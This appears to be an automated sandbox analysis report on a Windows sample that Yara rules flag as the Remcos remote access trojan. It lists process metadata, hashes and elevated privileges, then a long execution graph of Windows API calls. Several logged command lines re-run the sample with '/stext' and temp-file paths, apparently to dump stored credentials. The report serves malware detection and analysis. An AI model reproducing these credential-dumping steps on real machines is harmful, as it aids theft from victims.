Path:C:\Users\user\Desktop\asXlZG3aW6.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\asXlZG3aW6.exe"
Imagebase:0x400000
File size:292'592 bytes
MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Target ID:131
                                                                                                                                                                                  Start time:10:52:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:132
                                                                                                                                                                                  Start time:10:52:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:133
                                                                                                                                                                                  Start time:10:52:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true


                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:22.5%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:14.2%
                                                                                                                                                                                    Signature Coverage:20.1%
                                                                                                                                                                                    Total number of Nodes:1483
                                                                                                                                                                                    Total number of Limit Nodes:48
CharNextA 4018->4026 4058 4034f9 4018->4058 4071 403509 4018->4071 4021 4031c0 12 API calls 4019->4021 4024 403457 4021->4024 4024->4011 4024->4071 4038 40348e 4026->4038 4027 403641 4030 4036c3 ExitProcess 4027->4030 4031 403649 GetCurrentProcess OpenProcessToken 4027->4031 4028 403523 4216 405681 4028->4216 4036 403694 4031->4036 4037 403664 LookupPrivilegeValueA AdjustTokenPrivileges 4031->4037 4034 4034d4 4193 4059eb 4034->4193 4035 403539 4181 4055ec 4035->4181 4041 4062fd 5 API calls 4036->4041 4037->4036 4038->4034 4038->4035 4044 40369b 4041->4044 4047 4036b0 ExitWindowsEx 4044->4047 4050 4036bc 4044->4050 4045 40355a lstrcatA lstrcmpiA 4049 403576 4045->4049 4045->4071 4046 40354f lstrcatA 4046->4045 4047->4030 4047->4050 4053 403582 4049->4053 4054 40357b 4049->4054 4229 40140b 4050->4229 4052 4034ee 4208 405f65 lstrcpynA 4052->4208 4225 4055cf CreateDirectoryA 4053->4225 4220 405552 CreateDirectoryA 4054->4220 4125 4037b5 4058->4125 4060 403587 SetCurrentDirectoryA 4061 4035a1 4060->4061 4062 403596 4060->4062 4184 405f65 lstrcpynA 4061->4184 4228 405f65 lstrcpynA 4062->4228 4065 405f87 17 API calls 4066 4035e0 DeleteFileA 4065->4066 4067 4035ed CopyFileA 4066->4067 4073 4035af 4066->4073 4067->4073 4068 403635 4069 405d44 36 API calls 4068->4069 4069->4071 4209 4036db 4071->4209 4072 405f87 17 API calls 4072->4073 4073->4065 4073->4068 4073->4072 4075 403621 CloseHandle 4073->4075 4185 405d44 MoveFileExA 4073->4185 4189 405604 CreateProcessA 4073->4189 4075->4073 4077 4062b1 wsprintfA LoadLibraryExA 4076->4077 4077->3990 4080 406323 GetProcAddress 4079->4080 4081 406319 4079->4081 4084 403264 4080->4084 4082 40628f 3 API calls 4081->4082 4083 40631f 4082->4083 4083->4080 4083->4084 4084->3994 4085->4000 4086->4002 4088 4061cf 5 API calls 4087->4088 4089 4031cc 4088->4089 4090 4031d6 4089->4090 4232 4058fd lstrlenA CharPrevA 4089->4232 4090->4009 4093 4055cf 2 API calls 4094 4031e4 4093->4094 4095 405b2d 2 API calls 4094->4095 4096 4031ef 4095->4096 
4096->4009 4235 405afe GetFileAttributesA CreateFileA 4097->4235 4099 402d88 4117 402d98 4099->4117 4236 405f65 lstrcpynA 4099->4236 4101 402dae 4237 405944 lstrlenA 4101->4237 4105 402dbf GetFileSize 4106 402ebb 4105->4106 4119 402dd6 4105->4119 4242 402ce4 4106->4242 4108 402ec4 4110 402ef4 GlobalAlloc 4108->4110 4108->4117 4277 4031a9 SetFilePointer 4108->4277 4253 4031a9 SetFilePointer 4110->4253 4112 402f27 4116 402ce4 6 API calls 4112->4116 4114 402edd 4118 403193 ReadFile 4114->4118 4115 402f0f 4254 402f81 4115->4254 4116->4117 4117->4018 4121 402ee8 4118->4121 4119->4106 4119->4112 4119->4117 4122 402ce4 6 API calls 4119->4122 4274 403193 4119->4274 4121->4110 4121->4117 4122->4119 4123 402f1b 4123->4117 4123->4123 4124 402f58 SetFilePointer 4123->4124 4124->4117 4126 4062fd 5 API calls 4125->4126 4127 4037c9 4126->4127 4128 4037e1 4127->4128 4129 4037cf 4127->4129 4130 405e4c 3 API calls 4128->4130 4293 405ec3 wsprintfA 4129->4293 4131 40380c 4130->4131 4133 40382a lstrcatA 4131->4133 4135 405e4c 3 API calls 4131->4135 4134 4037df 4133->4134 4285 403a7a 4134->4285 4135->4133 4138 4059eb 18 API calls 4139 40385c 4138->4139 4140 4038e5 4139->4140 4142 405e4c 3 API calls 4139->4142 4141 4059eb 18 API calls 4140->4141 4143 4038eb 4141->4143 4144 403888 4142->4144 4145 4038fb LoadImageA 4143->4145 4146 405f87 17 API calls 4143->4146 4144->4140 4149 4038a4 lstrlenA 4144->4149 4153 405928 CharNextA 4144->4153 4147 4039a1 4145->4147 4148 403922 RegisterClassA 4145->4148 4146->4145 4152 40140b 2 API calls 4147->4152 4150 4039ab 4148->4150 4151 403958 SystemParametersInfoA CreateWindowExA 4148->4151 4154 4038b2 lstrcmpiA 4149->4154 4155 4038d8 4149->4155 4150->4071 4151->4147 4156 4039a7 4152->4156 4158 4038a2 4153->4158 4154->4155 4159 4038c2 GetFileAttributesA 4154->4159 4157 4058fd 3 API calls 4155->4157 4156->4150 4160 403a7a 18 API calls 4156->4160 4161 4038de 4157->4161 4158->4149 4162 4038ce 4159->4162 4163 4039b8 4160->4163 4294 405f65 lstrcpynA 4161->4294 
4162->4155 4165 405944 2 API calls 4162->4165 4166 4039c4 ShowWindow 4163->4166 4167 403a47 4163->4167 4165->4155 4169 40628f 3 API calls 4166->4169 4168 40515e 5 API calls 4167->4168 4170 403a4d 4168->4170 4172 4039dc 4169->4172 4171 403a69 4170->4171 4174 403a51 4170->4174 4175 40140b 2 API calls 4171->4175 4173 4039ea GetClassInfoA 4172->4173 4176 40628f 3 API calls 4172->4176 4177 403a14 DialogBoxParamA 4173->4177 4178 4039fe GetClassInfoA RegisterClassA 4173->4178 4174->4150 4179 40140b 2 API calls 4174->4179 4175->4150 4176->4173 4180 40140b 2 API calls 4177->4180 4178->4177 4179->4150 4180->4150 4182 4062fd 5 API calls 4181->4182 4183 40353e lstrcatA 4182->4183 4183->4045 4183->4046 4184->4073 4186 405d65 4185->4186 4187 405d58 4185->4187 4186->4073 4299 405bd4 4187->4299 4190 405643 4189->4190 4191 405637 CloseHandle 4189->4191 4190->4073 4191->4190 4192->4007 4333 405f65 lstrcpynA 4193->4333 4195 4059fc 4334 405996 CharNextA CharNextA 4195->4334 4198 4034df 4198->4071 4207 405f65 lstrcpynA 4198->4207 4199 4061cf 5 API calls 4205 405a12 4199->4205 4200 405a3d lstrlenA 4201 405a48 4200->4201 4200->4205 4203 4058fd 3 API calls 4201->4203 4202 406268 2 API calls 4202->4205 4204 405a4d GetFileAttributesA 4203->4204 4204->4198 4205->4198 4205->4200 4205->4202 4206 405944 2 API calls 4205->4206 4206->4200 4207->4052 4208->4058 4210 4036f3 4209->4210 4211 4036e5 CloseHandle 4209->4211 4340 403720 4210->4340 4211->4210 4217 405696 4216->4217 4218 4056aa MessageBoxIndirectA 4217->4218 4219 403531 ExitProcess 4217->4219 4218->4219 4221 4055a3 GetLastError 4220->4221 4222 403580 4220->4222 4221->4222 4223 4055b2 SetFileSecurityA 4221->4223 4222->4060 4223->4222 4224 4055c8 GetLastError 4223->4224 4224->4222 4226 4055e3 GetLastError 4225->4226 4227 4055df 4225->4227 4226->4227 4227->4060 4228->4061 4230 401389 2 API calls 4229->4230 4231 401420 4230->4231 4231->4030 4233 4031de 4232->4233 4234 405917 lstrcatA 4232->4234 4233->4093 4234->4233 4235->4099 4236->4101 4238 
405951 4237->4238 4239 402db4 4238->4239 4240 405956 CharPrevA 4238->4240 4241 405f65 lstrcpynA 4239->4241 4240->4238 4240->4239 4241->4105 4243 402d05 4242->4243 4244 402ced 4242->4244 4247 402d15 GetTickCount 4243->4247 4248 402d0d 4243->4248 4245 402cf6 DestroyWindow 4244->4245 4246 402cfd 4244->4246 4245->4246 4246->4108 4250 402d23 CreateDialogParamA ShowWindow 4247->4250 4251 402d46 4247->4251 4278 406339 4248->4278 4250->4251 4251->4108 4253->4115 4256 402f97 4254->4256 4255 402fc5 4258 403193 ReadFile 4255->4258 4256->4255 4284 4031a9 SetFilePointer 4256->4284 4259 402fd0 4258->4259 4260 402fe2 GetTickCount 4259->4260 4261 40312c 4259->4261 4263 403116 4259->4263 4260->4263 4270 403031 4260->4270 4262 40316e 4261->4262 4267 403130 4261->4267 4265 403193 ReadFile 4262->4265 4263->4123 4264 403193 ReadFile 4264->4270 4265->4263 4266 403193 ReadFile 4266->4267 4267->4263 4267->4266 4268 405ba5 WriteFile 4267->4268 4268->4267 4269 403087 GetTickCount 4269->4270 4270->4263 4270->4264 4270->4269 4271 4030ac MulDiv wsprintfA 4270->4271 4282 405ba5 WriteFile 4270->4282 4272 40508c 24 API calls 4271->4272 4272->4270 4275 405b76 ReadFile 4274->4275 4276 4031a6 4275->4276 4276->4119 4277->4114 4279 406356 PeekMessageA 4278->4279 4280 402d13 4279->4280 4281 40634c DispatchMessageA 4279->4281 4280->4108 4281->4279 4283 405bc3 4282->4283 4283->4270 4284->4255 4286 403a8e 4285->4286 4295 405ec3 wsprintfA 4286->4295 4288 403aff 4296 403b33 4288->4296 4290 40383a 4290->4138 4291 403b04 4291->4290 4292 405f87 17 API calls 4291->4292 4292->4291 4293->4134 4294->4140 4295->4288 4297 405f87 17 API calls 4296->4297 4298 403b41 SetWindowTextA 4297->4298 4298->4291 4300 405c20 GetShortPathNameA 4299->4300 4301 405bfa 4299->4301 4302 405c35 4300->4302 4303 405d3f 4300->4303 4326 405afe GetFileAttributesA CreateFileA 4301->4326 4302->4303 4306 405c3d wsprintfA 4302->4306 4303->4186 4305 405c04 CloseHandle GetShortPathNameA 4305->4303 4307 405c18 4305->4307 4308 405f87 17 API calls 
4306->4308 4307->4300 4307->4303 4309 405c65 4308->4309 4327 405afe GetFileAttributesA CreateFileA 4309->4327 4311 405c72 4311->4303 4312 405c81 GetFileSize GlobalAlloc 4311->4312 4313 405ca3 4312->4313 4314 405d38 CloseHandle 4312->4314 4315 405b76 ReadFile 4313->4315 4314->4303 4316 405cab 4315->4316 4316->4314 4328 405a63 lstrlenA 4316->4328 4319 405cc2 lstrcpyA 4322 405ce4 4319->4322 4320 405cd6 4321 405a63 4 API calls 4320->4321 4321->4322 4323 405d1b SetFilePointer 4322->4323 4324 405ba5 WriteFile 4323->4324 4325 405d31 GlobalFree 4324->4325 4325->4314 4326->4305 4327->4311 4329 405aa4 lstrlenA 4328->4329 4330 405aac 4329->4330 4331 405a7d lstrcmpiA 4329->4331 4330->4319 4330->4320 4331->4330 4332 405a9b CharNextA 4331->4332 4332->4329 4333->4195 4335 4059b1 4334->4335 4337 4059c1 4334->4337 4335->4337 4338 4059bc CharNextA 4335->4338 4336 4059e1 4336->4198 4336->4199 4337->4336 4339 405928 CharNextA 4337->4339 4338->4336 4339->4337 4341 40372e 4340->4341 4342 4036f8 4341->4342 4343 403733 FreeLibrary GlobalFree 4341->4343 4344 40572d 4342->4344 4343->4342 4343->4343 4345 4059eb 18 API calls 4344->4345 4346 40574d 4345->4346 4347 405755 DeleteFileA 4346->4347 4348 40576c 4346->4348 4349 403512 OleUninitialize 4347->4349 4350 4058a4 4348->4350 4384 405f65 lstrcpynA 4348->4384 4349->4027 4349->4028 4350->4349 4355 406268 2 API calls 4350->4355 4352 405792 4353 4057a5 4352->4353 4354 405798 lstrcatA 4352->4354 4356 405944 2 API calls 4353->4356 4358 4057ab 4354->4358 4357 4058be 4355->4357 4356->4358 4357->4349 4360 4058c2 4357->4360 4359 4057b9 lstrcatA 4358->4359 4361 4057c4 lstrlenA FindFirstFileA 4358->4361 4359->4361 4362 4058fd 3 API calls 4360->4362 4363 40589a 4361->4363 4382 4057e8 4361->4382 4364 4058c8 4362->4364 4363->4350 4366 4056e5 5 API calls 4364->4366 4365 405928 CharNextA 4365->4382 4367 4058d4 4366->4367 4368 4058d8 4367->4368 4369 4058ee 4367->4369 4368->4349 4374 40508c 24 API calls 4368->4374 4372 40508c 24 API calls 4369->4372 4370 405879 
FindNextFileA 4373 405891 FindClose 4370->4373 4370->4382 4372->4349 4373->4363 4375 4058e5 4374->4375 4376 405d44 36 API calls 4375->4376 4379 4058ec 4376->4379 4378 40572d 60 API calls 4378->4382 4379->4349 4380 40508c 24 API calls 4380->4370 4381 40508c 24 API calls 4381->4382 4382->4365 4382->4370 4382->4378 4382->4380 4382->4381 4383 405d44 36 API calls 4382->4383 4385 405f65 lstrcpynA 4382->4385 4386 4056e5 4382->4386 4383->4382 4384->4352 4385->4382 4394 405ad9 GetFileAttributesA 4386->4394 4389 405700 RemoveDirectoryA 4392 40570e 4389->4392 4390 405708 DeleteFileA 4390->4392 4391 405712 4391->4382 4392->4391 4393 40571e SetFileAttributesA 4392->4393 4393->4391 4395 4056f1 4394->4395 4396 405aeb SetFileAttributesA 4394->4396 4395->4389 4395->4390 4395->4391 4396->4395 4999 406372 WaitForSingleObject 5000 40638c 4999->5000 5001 40639e GetExitCodeProcess 5000->5001 5002 406339 2 API calls 5000->5002 5003 406393 WaitForSingleObject 5002->5003 5003->5000 5004 403773 5005 40377e 5004->5005 5006 403782 5005->5006 5007 403785 GlobalAlloc 5005->5007 5007->5006 5008 100015b3 5009 100014bb GlobalFree 5008->5009 5011 100015cb 5009->5011 5010 10001611 GlobalFree 5011->5010 5012 100015e6 5011->5012 5013 100015fd VirtualFree 5011->5013 5012->5010 5013->5010 5014 4014f4 SetForegroundWindow 5015 402951 5014->5015 5016 401cf5 5017 402a9f 17 API calls 5016->5017 5018 401cfc 5017->5018 5019 402a9f 17 API calls 5018->5019 5020 401d08 GetDlgItem 5019->5020 5021 402577 5020->5021 4477 4022f6 4478 402304 4477->4478 4479 4022fe 4477->4479 4481 402314 4478->4481 4482 402ac1 17 API calls 4478->4482 4480 402ac1 17 API calls 4479->4480 4480->4478 4484 402ac1 17 API calls 4481->4484 4486 402322 4481->4486 4482->4481 4483 402ac1 17 API calls 4485 40232b WritePrivateProfileStringA 4483->4485 4484->4486 4486->4483 5022 4026f8 5023 402ac1 17 API calls 5022->5023 5024 4026ff FindFirstFileA 5023->5024 5025 402722 5024->5025 5029 402712 5024->5029 5026 402729 5025->5026 5030 405ec3 wsprintfA 
5025->5030 5031 405f65 lstrcpynA 5026->5031 5030->5026 5031->5029 4529 40237b 4530 402382 4529->4530 4531 4023ad 4529->4531 4532 402b01 17 API calls 4530->4532 4533 402ac1 17 API calls 4531->4533 4534 402389 4532->4534 4535 4023b4 4533->4535 4536 402393 4534->4536 4540 4023c1 4534->4540 4541 402b7f 4535->4541 4538 402ac1 17 API calls 4536->4538 4539 40239a RegDeleteValueA RegCloseKey 4538->4539 4539->4540 4542 402b95 4541->4542 4543 402bab 4542->4543 4545 402bb4 4542->4545 4543->4540 4546 405deb RegOpenKeyExA 4545->4546 4547 402be2 4546->4547 4548 402c08 RegEnumKeyA 4547->4548 4549 402c1f RegCloseKey 4547->4549 4550 402c40 RegCloseKey 4547->4550 4552 402bb4 6 API calls 4547->4552 4554 402c33 4547->4554 4548->4547 4548->4549 4551 4062fd 5 API calls 4549->4551 4550->4554 4553 402c2f 4551->4553 4552->4547 4553->4554 4555 402c4e RegDeleteKeyA 4553->4555 4554->4543 4555->4554 4579 401ffd 4580 40200f 4579->4580 4582 4020bd 4579->4582 4581 402ac1 17 API calls 4580->4581 4584 402016 4581->4584 4583 401423 24 API calls 4582->4583 4589 40223c 4583->4589 4585 402ac1 17 API calls 4584->4585 4586 40201f 4585->4586 4587 402034 LoadLibraryExA 4586->4587 4588 402027 GetModuleHandleA 4586->4588 4587->4582 4590 402044 GetProcAddress 4587->4590 4588->4587 4588->4590 4591 402090 4590->4591 4592 402053 4590->4592 4593 40508c 24 API calls 4591->4593 4594 402072 4592->4594 4595 40205b 4592->4595 4596 402063 4593->4596 4600 100016bd 4594->4600 4597 401423 24 API calls 4595->4597 4596->4589 4598 4020b1 FreeLibrary 4596->4598 4597->4596 4598->4589 4601 100016ed 4600->4601 4642 10001a5d 4601->4642 4603 100016f4 4604 1000180a 4603->4604 4605 10001705 4603->4605 4606 1000170c 4603->4606 4604->4596 4690 100021b0 4605->4690 4674 100021fa 4606->4674 4611 10001770 4616 100017b2 4611->4616 4617 10001776 4611->4617 4612 10001752 4703 100023d8 4612->4703 4613 10001722 4615 10001728 4613->4615 4620 10001733 4613->4620 4614 1000173b 4626 10001731 4614->4626 4700 10002a9f 4614->4700 4615->4626 4684 
100027e4 4615->4684 4624 100023d8 11 API calls 4616->4624 4622 10001559 3 API calls 4617->4622 4619 10001758 4714 10001559 4619->4714 4694 10002587 4620->4694 4628 1000178c 4622->4628 4629 100017a4 4624->4629 4626->4611 4626->4612 4632 100023d8 11 API calls 4628->4632 4641 100017f9 4629->4641 4725 1000239e 4629->4725 4631 10001739 4631->4626 4632->4629 4636 10001803 GlobalFree 4636->4604 4638 100017e5 4638->4641 4729 100014e2 wsprintfA 4638->4729 4639 100017de FreeLibrary 4639->4638 4641->4604 4641->4636 4732 10001215 GlobalAlloc 4642->4732 4644 10001a81 4733 10001215 GlobalAlloc 4644->4733 4646 10001cbb GlobalFree GlobalFree GlobalFree 4647 10001cd8 4646->4647 4656 10001d22 4646->4656 4648 1000201a 4647->4648 4647->4656 4657 10001ced 4647->4657 4651 1000203c GetModuleHandleA 4648->4651 4648->4656 4649 10001b60 GlobalAlloc 4650 10001a8c 4649->4650 4650->4646 4650->4649 4652 10001bab lstrcpyA 4650->4652 4653 10001bc9 GlobalFree 4650->4653 4650->4656 4658 10001bb5 lstrcpyA 4650->4658 4661 10001f7a 4650->4661 4667 10001c07 4650->4667 4668 10001e75 GlobalFree 4650->4668 4672 10001224 2 API calls 4650->4672 4739 10001215 GlobalAlloc 4650->4739 4654 10002062 4651->4654 4655 1000204d LoadLibraryA 4651->4655 4652->4658 4653->4650 4740 100015a4 GetProcAddress 4654->4740 4655->4654 4655->4656 4656->4603 4657->4656 4736 10001224 4657->4736 4658->4650 4660 100020b3 4660->4656 4662 100020c0 lstrlenA 4660->4662 4661->4656 4666 10001fbe lstrcpyA 4661->4666 4741 100015a4 GetProcAddress 4662->4741 4666->4656 4667->4650 4734 10001534 GlobalSize GlobalAlloc 4667->4734 4668->4650 4669 10002074 4669->4660 4673 1000209d GetProcAddress 4669->4673 4670 100020d9 4670->4656 4672->4650 4673->4660 4682 10002212 4674->4682 4676 10002347 GlobalFree 4677 10001712 4676->4677 4676->4682 4677->4613 4677->4614 4677->4626 4678 100022bb GlobalAlloc MultiByteToWideChar 4680 100022e5 GlobalAlloc CLSIDFromString GlobalFree 4678->4680 4681 10002306 4678->4681 4679 10001224 GlobalAlloc lstrcpynA 4679->4682 
4680->4676 4681->4676 4747 1000251b 4681->4747 4682->4676 4682->4678 4682->4679 4682->4681 4743 100012ad 4682->4743 4687 100027f6 4684->4687 4685 1000289b ReadFile 4686 100028b9 4685->4686 4688 100029b5 4686->4688 4689 100029aa GetLastError 4686->4689 4687->4685 4688->4626 4689->4688 4691 100021c0 4690->4691 4692 1000170b 4690->4692 4691->4692 4693 100021d2 GlobalAlloc 4691->4693 4692->4606 4693->4691 4698 100025a3 4694->4698 4695 100025f4 GlobalAlloc 4699 10002616 4695->4699 4696 10002607 4697 1000260c GlobalSize 4696->4697 4696->4699 4697->4699 4698->4695 4698->4696 4699->4631 4701 10002aaa 4700->4701 4702 10002aea GlobalFree 4701->4702 4750 10001215 GlobalAlloc 4703->4750 4705 10002438 lstrcpynA 4712 100023e4 4705->4712 4706 10002449 StringFromGUID2 WideCharToMultiByte 4706->4712 4707 1000246d WideCharToMultiByte 4707->4712 4708 100024b2 GlobalFree 4708->4712 4709 1000248e wsprintfA 4709->4712 4710 100024ec GlobalFree 4710->4619 4711 10001266 2 API calls 4711->4712 4712->4705 4712->4706 4712->4707 4712->4708 4712->4709 4712->4710 4712->4711 4751 100012d1 4712->4751 4755 10001215 GlobalAlloc 4714->4755 4716 1000155f 4717 1000156c lstrcpyA 4716->4717 4719 10001586 4716->4719 4720 100015a0 4717->4720 4719->4720 4721 1000158b wsprintfA 4719->4721 4722 10001266 4720->4722 4721->4720 4723 100012a8 GlobalFree 4722->4723 4724 1000126f GlobalAlloc lstrcpynA 4722->4724 4723->4629 4724->4723 4726 100023ac 4725->4726 4728 100017c5 4725->4728 4727 100023c5 GlobalFree 4726->4727 4726->4728 4727->4726 4728->4638 4728->4639 4730 10001266 2 API calls 4729->4730 4731 10001503 4730->4731 4731->4641 4732->4644 4733->4650 4735 10001552 4734->4735 4735->4667 4742 10001215 GlobalAlloc 4736->4742 4738 10001233 lstrcpynA 4738->4656 4739->4650 4740->4669 4741->4670 4742->4738 4744 100012b4 4743->4744 4745 10001224 2 API calls 4744->4745 4746 100012cf 4745->4746 4746->4682 4748 10002529 VirtualAlloc 4747->4748 4749 1000257f 4747->4749 4748->4749 4749->4681 4750->4712 4752 100012f9 
4751->4752 4753 100012da 4751->4753 4752->4712 4753->4752 4754 100012e0 lstrcpyA 4753->4754 4754->4752 4755->4716 5032 1000103d 5033 1000101b 5 API calls 5032->5033 5034 10001056 5033->5034 5035 4018fd 5036 401934 5035->5036 5037 402ac1 17 API calls 5036->5037 5038 401939 5037->5038 5039 40572d 67 API calls 5038->5039 5040 401942 5039->5040 5041 40257d 5042 402582 5041->5042 5043 402596 5041->5043 5044 402a9f 17 API calls 5042->5044 5045 402ac1 17 API calls 5043->5045 5047 40258b 5044->5047 5046 40259d lstrlenA 5045->5046 5046->5047 5048 4025bf 5047->5048 5049 405ba5 WriteFile 5047->5049 5049->5048 5050 100029bf 5051 100029d7 5050->5051 5052 10001534 2 API calls 5051->5052 5053 100029f2 5052->5053 5054 401000 5055 401037 BeginPaint GetClientRect 5054->5055 5056 40100c DefWindowProcA 5054->5056 5058 4010f3 5055->5058 5059 401179 5056->5059 5060 401073 CreateBrushIndirect FillRect DeleteObject 5058->5060 5061 4010fc 5058->5061 5060->5058 5062 401102 CreateFontIndirectA 5061->5062 5063 401167 EndPaint 5061->5063 5062->5063 5064 401112 6 API calls 5062->5064 5063->5059 5064->5063 5065 405000 5066 405010 5065->5066 5067 405024 5065->5067 5068 405016 5066->5068 5077 40506d 5066->5077 5069 40502c IsWindowVisible 5067->5069 5073 405043 5067->5073 5071 404072 SendMessageA 5068->5071 5072 405039 5069->5072 5069->5077 5070 405072 CallWindowProcA 5074 405020 5070->5074 5071->5074 5078 404957 SendMessageA 5072->5078 5073->5070 5083 4049d7 5073->5083 5077->5070 5079 4049b6 SendMessageA 5078->5079 5080 40497a GetMessagePos ScreenToClient SendMessageA 5078->5080 5082 4049ae 5079->5082 5081 4049b3 5080->5081 5080->5082 5081->5079 5082->5073 5092 405f65 lstrcpynA 5083->5092 5085 4049ea 5093 405ec3 wsprintfA 5085->5093 5087 4049f4 5088 40140b 2 API calls 5087->5088 5089 4049fd 5088->5089 5094 405f65 lstrcpynA 5089->5094 5091 404a04 5091->5077 5092->5085 5093->5087 5094->5091 5095 401900 5096 402ac1 17 API calls 5095->5096 5097 401907 5096->5097 5098 405681 MessageBoxIndirectA 
